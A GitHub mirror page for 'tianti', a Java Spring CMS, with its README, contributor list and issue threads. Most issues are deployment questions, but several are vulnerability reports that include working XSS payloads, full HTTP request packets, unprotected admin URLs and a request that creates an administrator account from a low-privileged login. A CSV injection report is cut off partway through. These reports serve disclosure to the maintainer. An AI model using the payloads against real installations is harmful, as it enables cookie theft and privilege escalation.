xujeff / tianti Goto Github PK

java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案，用户可以结合自身业务进行相应扩展，同时提供了针对dao、service等的代码生成工具。技术选型：Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。

License: Apache License 2.0

Java 95.32% HTML 4.68%

java cms spring-mvc hibernate spring-data-jpa layer shiro mysql

tianti's Introduction

天梯（tianti）

天梯 tianti-tool简介：

1、天梯是一款使用Java编写的免费的轻量级CMS系统，目前提供了从后台管理到前端展现的整体解决方案。
2、用户可以不编写一句代码，就制作出一个默认风格的CMS站点。
3、前端页面自适应，支持PC和H5端，采用前后端分离的机制实现。后端支持天梯蓝和天梯红换肤功能。
4、项目技术分层明显，用户可以根据自己的业务模块进行相应地扩展，很方便二次开发。

技术架构：

 1、技术选型：
    后端
     ·核心框架：Spring Framework 4.2.5.RELEASE
     ·安全框架：Apache Shiro 1.3.2
     ·视图框架：Spring MVC 4.2.5.RELEASE
     ·数据库连接池：Tomcat JDBC
     ·缓存框架：Ehcache 
     ·ORM框架：Spring Data JPA、hibernate 4.3.5.Final
     ·日志管理：SLF4J 1.7.21、Log4j
     ·编辑器：ueditor
     ·工具类：Apache Commons、Jackson 2.8.5、POI 3.15
     ·view层：JSP
     ·数据库：mysql、oracle等关系型数据库

    前端
     ·dom : Jquery
     ·分页 : jquery.pagination
     ·UI管理 : common
     ·UI集成 : uiExtend
     ·滚动条 : jquery.nicescroll.min.js
     ·图表 ： highcharts
     ·3D图表 ：highcharts-more
     ·轮播图 ： jquery-swipe
     ·表单提交 ：jquery.form
     ·文件上传 ：jquery.uploadify
     ·表单验证 ：jquery.validator
     ·展现树 ：jquery.ztree
     ·html模版引擎 ：template
 2、项目结构：
   2.1、tianti-common：系统基础服务抽象，包括entity、dao和service的基础抽象；
   2.2、tianti-org：用户权限模块服务实现；
   2.3、tianti-cms:资讯类模块服务实现；
   2.4、tianti-module-admin：天梯后台web项目实现；
   2.5、tianti-module-interface：天梯接口项目实现；
   2.6、tianti-module-gateway：天梯前端自适应项目实现（是一个静态项目，调用tianti-module-interface获取数据）；

前端项目概览：
PC：
H5:

后台项目概览：
天梯登陆页面：天梯蓝风格（默认）：

天梯红风格：

tianti's People

Contributors

Stargazers

Watchers

Forkers

geekcheng b-xiang schuckbeta jianfangxu 435398804 wupingheng2015 brucezhong ssbbzuo davidmr001 pvijay127 liujiliang2008 startrekor lldemo fengyunsno a476487492 sanzhisanzhi jianghuaa1986 vitojc trainkg kangyuanjia yeetsai bushinvren cuicannianhua chrismayday heaunter shybbq fooiisher dut3062796s chenhbzl wensincai qdhk redfeng imchenxiansheng zsf513 huangjiancong wangzhenyong icodingstar hcjhope opensoce yzcheng90 luopc luffypercy qianpeng2 ch123iu maliqiang woniulinux fanlinglong kebin8 toflywang omge erhei0317 eastmacro linhuaiyu xihashao sumare1 xiaopohou wongyu cattles sjian1990 dragon-zhong lihanyao inocsin foobean saselovejulie bbearb zihpzhong yinrongping 54chenjian lidongxufc sshero eagle518 wp-jackliu mayude 785468931 wangtianyang swyl hadoop168 dzxyzhanglin wcq805 ahstusujian 357037959 bora203 xfworld wupaa soa4java alexguo88 facealone lyzhanghai lyndonchen yanjianglee brania lansehongbaoshi jxmooner sinper0212 yankaics yubai0 tangaiyun handafa iwq1990512 baijianwei827

tianti's Issues

17-Jul-2017 15:29:47.745 SEVERE [localhost-startStop-1] org.apache.tomcat.jdbc.pool.ConnectionPool.init Unable to create initial connections of pool. java.sql.SQLException: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long

17-Jul-2017 15:29:47.745 SEVERE [localhost-startStop-1] org.apache.tomcat.jdbc.pool.ConnectionPool.init Unable to create initial connections of pool.
java.sql.SQLException: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:1074)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:988)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:974)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:919)
at com.mysql.jdbc.ConnectionImpl.buildCollationMapping(ConnectionImpl.java:1041)
at com.mysql.jdbc.ConnectionImpl.initializePropsFromServer(ConnectionImpl.java:3496)
at com.mysql.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:2460)
at com.mysql.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:2230)
at com.mysql.jdbc.ConnectionImpl.(ConnectionImpl.java:813)
at com.mysql.jdbc.JDBC4Connection.(JDBC4Connection.java:47)
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
at com.mysql.jdbc.Util.handleNewInstance(Util.java:411)
at com.mysql.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:399)
at com.mysql.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:334)
at org.apache.tomcat.jdbc.pool.PooledConnection.connectUsingDriver(PooledConnection.java:307)
at org.apache.tomcat.jdbc.pool.PooledConnection.connect(PooledConnection.java:200)
at org.apache.tomcat.jdbc.pool.ConnectionPool.createConnection(ConnectionPool.java:708)
at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:642)
at org.apache.tomcat.jdbc.pool.ConnectionPool.init(ConnectionPool.java:464)
at org.apache.tomcat.jdbc.pool.ConnectionPool.(ConnectionPool.java:141)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.pCreatePool(DataSourceProxy.java:115)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.createPool(DataSourceProxy.java:102)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.getConnection(DataSourceProxy.java:126)
at org.springside.modules.persistence.Hibernates.getJdbcUrlFromDataSource(Hibernates.java:57)
at org.springside.modules.persistence.Hibernates.getDialect(Hibernates.java:36)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.beans.factory.support.SimpleInstantiationStrategy.instantiate(SimpleInstantiationStrategy.java:162)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:588)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1123)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1018)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:510)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveInnerBean(BeanDefinitionValueResolver.java:299)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:122)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.ConstructorResolver.resolveConstructorArguments(ConstructorResolver.java:634)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:444)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1123)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1018)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:510)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:296)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:202)
at org.springframework.context.support.PostProcessorRegistrationDelegate.registerBeanPostProcessors(PostProcessorRegistrationDelegate.java:240)
at org.springframework.context.support.AbstractApplicationContext.registerBeanPostProcessors(AbstractApplicationContext.java:687)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:523)
at org.springframework.web.context.ContextLoader.configureAndRefreshWebApplicationContext(ContextLoader.java:444)
at org.springframework.web.context.ContextLoader.initWebApplicationContext(ContextLoader.java:326)
at org.springframework.web.context.ContextLoaderListener.contextInitialized(ContextLoaderListener.java:107)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4842)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5303)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:147)
at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:725)
at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:701)
at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:717)
at org.apache.catalina.startup.HostConfig.deployWAR(HostConfig.java:940)
at org.apache.catalina.startup.HostConfig$DeployWar.run(HostConfig.java:1816)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long
at com.mysql.jdbc.ConnectionImpl.buildCollationMapping(ConnectionImpl.java:992)
... 145 more

There are some XSS flaws in your project

   Hello，guy，i'm sorry to tell you that your project has so many XSS flaws.

first of all,the userlist module exists a storage type XSS，which will cause cookie Disclosure and Escalation of Privileges.
the following picture is the proof of this flaws：

packet
`POST /tianti-module-admin/user/ajax/save_role HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 329
Accept: /
Origin: http://127.0.0.1:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/role_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

id=2c9025ab5a6f2b85015a6f2cef950000&name=%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86%E5%91%98%22%3E%3Cimg+src%3Di+onerror%3Dalert(document.cookie)&description=%E5%8F%AF%E4%BB%A5%E5%88%86%E9%85%8D%E5%90%8E%E5%8F%B0%E7%94%A8%E6%88%B7&rescoureIds=70&rescoureIds=71&rescoureIds=72&rescoureIds=73&rescoureIds=2c9025ab5adb1eef015adb2e74b90000`

payload:
"><img src=i onerror=alert(1)>
The following is the descripment of this flaws according to the leak of the code.

  The path of this pice of code is :tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp.
  user_list.jsp received the value from "controller" and displace it without any defensive measures.
  Here is the "usercontroller",and we can get the request parameters from users

It put the userinfo to the User object.This object will be return to the "view",by ajax method.
And we can see,it doesn't exits any defensive measures.

  Secondly, in the article management mudle,there also exists a storage type xss.
  The following picture is the proof of this flaws:

   And the following the is  entry of the flaws

   Thirdly,in the usermanagement mudle,there exists a reflect xss.

this functional mudle is created to check the userinfo through the keyword of the user entered.

packet
`POST /tianti-module-admin/user/list HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 68
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

userName=%22%3E%3Cimg+src%3Di+onerror%3Dalert%281%29%3E&currentPage=`

payload
"><img src=i onerror=alert(document.cookie)>
Advice:
You can created a global interceptor to intercept the user requests,and check it if it has Potential threats,and you should also created another gloabal interceptor to intercept the response and,replcae the specail charcater to entity type.
Hope you guy fix the flaws quickly,if you have some questions,please contact me with the following e-mail address:
[email protected]

首页图片显示问题

如何显示首页的图片？

官方交流群找不到了？

您好，部署的过程中遇到了一些问题，想和人交流，但是官方的交流群已经搜不到了。

初学者，前台地址在哪里，如何运行？

部署了tianti-interface，找不到地址，后台可以正常跑，交流群怎么变成农药群了。。

项目中的那些图片在哪里呢？

数据库里保存的图片路径，实际上项目中的这个路径下并没有图片啊

Type Autowired cannot be resolved to a type

@service @Autowired找不到

admin后台，添加一个一个子菜单，跳转到这个页面的时候，左边栏目的选中内容消失了

你们从哪里找的部署手册和初始化sql的?还有你们项目启动的时候不报错吗?

这是啥意思？

如何部署这个项目

如上图，在完成pull之后怎么部署呢？

这个系统如何初始化？

下载了源代码，编译了几个 war 包，放到 webapps 下面，报了个 mysql root@localhost access denied 错误。

尝试修改 jdbc 参数，发现居然有4个文件，表示很懵逼

./tianti-module-admin/WEB-INF/classes/application.development.properties:jdbc.username=root
./tianti-module-admin/WEB-INF/classes/application.production.properties:jdbc.username=root
./tianti-module-admin/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-admin/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-interface/WEB-INF/classes/application.development.properties:jdbc.username=root
./tianti-module-interface/WEB-INF/classes/application.production.properties:jdbc.username=root
./tianti-module-interface/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-interface/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />

这个项目还维护吗？后台打开404，前台一堆JS错误，能不能写点初始化文档

There is a Incorrect accece control flaws in your project

 Hello,guy,there is a Incorrect access control flaws in your project.

The following is the proof of this flaws.
There are two roles in the project,permission role and super administrator role.The permission role only has the permission to change the permission of the users,and the super administrator role has all of the permissions,which contains permission management,content management,skin management.
when we use super administrator role to login in,we can see:

As the picture shows,the super administrator has three permissions.
When we use permission role to login in ,we can see:

as the picture show,the permission role has only one permission.

How is the flaws happen?
We know if the bakend controller dosen't check the permission of the role,it will cause Incorrect access control flaws.
see the code of the cmscontroller
the path of the cmscontroller is:
tianti-module-admin\src\main\java\com\jeff\tianti\controller\cmscontroller.java

In this place,we can see it use the spring framework,the request of "/column/list" map to function called columnList.It dosen't do permission check,which will cause the Incorect acess contol flaws.
How to proof it?
We request the url "http://127.0.0.1:8080/tianti-module-admin/cms/column/list" directly.

We can see,the permission role can access the column list page,and it can edit the column too.

And in the skin management,there exists Incorect access control,too.
We can use permission role to access the url "http://127.0.0.1:8080/tianti-module-admin/user/skin/list"

we can location the flaws code in
tianti-module-admin\src\main\java\com\jeff\tianti\controller\usercontroller.java

it map the request "/skin/list" to the function skinList,and dosen't do permission check.

Advice：

before excuting the main logic code of the function where the controller receiver the request from the frontend,please do permission check.

Hope ,you guy fix this flaws quickly ,if you have some questions,please contact me with the e-mail:
[email protected]

项目后续还有更新吗？？

期待更多的亮点

ExcelUtils导出的中文文件名为乱码

可将ExcelUtils的第84行改为

String fn = new String(fileName.getBytes("UTF-8"), "ISO8859-1");

CommonQueryDTO缺少相关方法导致程序编译不过

com.jeff.tianti.common.dto.CommonQueryDTO没有setLevel等相关方法，程序编译不过

请问支持多站点吗？

登陆失败

public interface UserDao extends SystemUserDao,CommonDao<User,String>{

@Query("select u from User u where u.deleteFlag = 0 and u.username=?1 ")
List<User> findUserByName(String userName);

登陆时使用的字段和sql中的字段不一致，登陆失败
表结构如下：
CREATE TABLE org_user (
id varchar(32) NOT NULL,
audit_flag varchar(2) DEFAULT NULL,
create_date datetime DEFAULT NULL,
delete_flag varchar(1) DEFAULT NULL,
update_date datetime DEFAULT NULL,
email varchar(30) DEFAULT NULL,
mobile varchar(20) DEFAULT NULL,
password varchar(32) DEFAULT NULL,
real_name varchar(50) DEFAULT NULL,
status int(11) DEFAULT NULL,
username varchar(50) DEFAULT NULL,
type int(11) DEFAULT '0',
current_skin varchar(16) DEFAULT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

Unauthorized addition of administrator vulnerabilities

The premise is that there is a login state

Create a low-privileged user

Send a post request as follows

POST /tianti-module-admin/user/ajax/save HTTP/1.1
Host: localhost:8888
Content-Length: 357
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8888/tianti-module-admin/user/ajax/save_role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4D9EA7A684D3CE5B2CBAF30D714E0B0A; _jspxcms=0bdeaa17af6448558d5181a98d4df1a0; Hm_lvt_57e9a5bfc4003c9bc1fd23dba7598170=1664259891; Phpstorm-66f14989=68db331b-21f1-4319-88e3-036932e5e8ad; _jpanonym="MGUyNzc1N2NmY2QwZTA0MDk4YzBlN2ZjNTY2YzBjYTQjMTY2ODM0MDQ1NjU5MCMzMTUzNjAwMCNOekkyTXpOaE1tVXpZak5sTkRCallqaGtORFZtTm1abE5qUm1OV1V4WkRRPQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1668340479; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1669038142,1669101592,1669167302; Hm_lvt_1040d081eea13b44d84a4af639640d51=1669203862; __bid_n=184a44da31c5abff074207; PUBLICCMS_ANALYTICS_ID=129faf04-65fd-46b0-8d88-56f21d780fe5; PUBLICCMS_ADMIN=1_e45b8556-ed10-4917-a0f5-8e9fc43a2828; JSESSIONID=d2e34d48-bb9d-4174-a34e-dff5b868def8
Connection: close

id=&username=123456789&password=123456&realName=&mobile=&roleId=402881e457f075530157f0791e2f0000

At this point we can log in to the super administrator 123456789

新建数据库名称是什么呀

请问这个项目在哪里用到了Ehcache呀

拜读了源码，没有找到应用Ehcache的部分

部署tomcat浏览器报错

栏目编码校验

请问栏目列表的新增二级栏目表单页栏目编码校验为什么不能跳转到controller的校验方法中？

前台首页打开之后是空白，怎么正常显示呢？

项目的常见问题

项目的常见问题已经归纳汇总到这本电子书：https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487

给群主点赞，热心帮大家解答各种疑问

实测，移动端页面展示仍有待完善

实测，后台未发现有可以添加H5模块及文章的功能

请问数据库文件在哪个位置？

111 请问怎么用eclipse的话，怎么生成相应的.classpath文件和.project文件

CSV Injection Vulnerability

The product has the CSV injection vulnerability，The premise is that you need to be in the login state

1, First create a low-privileged user

2, Log in to a low-privileged user and create a malicious user

Then send the package

POST /tianti-module-admin/user/ajax/save HTTP/1.1
Host: localhost:8888
Content-Length: 135
Cache-Control: max-age=0
